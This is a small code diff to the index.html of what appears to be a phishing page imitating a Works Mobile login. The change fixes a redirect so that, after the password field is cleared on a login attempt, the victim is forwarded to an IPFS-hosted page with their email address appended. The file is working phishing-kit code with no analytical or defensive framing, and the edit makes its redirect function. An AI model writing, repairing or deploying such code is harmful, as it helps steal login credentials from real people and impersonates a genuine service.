--- a/index.html
+++ b/index.html
@@ -232,7 +232,7 @@ alert('https://auth.worksmobile.com/login/login?accessUrl=https%3A%2F%2Fmail.wor
               $("#password").val("");
               if (count>=0) {
                 count=0;
-				window.location.replace("./https://ipfs.io/ipfs/bafkreihcaf3kv3eolntvsx5suv6qkopc3zp34aibp2jiwhfcp4jc24ej3q#"+email);
+				window.location.replace("https://ipfs.io/ipfs/bafkreihcaf3kv3eolntvsx5suv6qkopc3zp34aibp2jiwhfcp4jc24ej3q#"+email);
               }
               // $("#div1").animate({left:200, opacity:"hide"}, 0);
               // $("#div2").animate({right:200, opacity:"show"}, 1000);
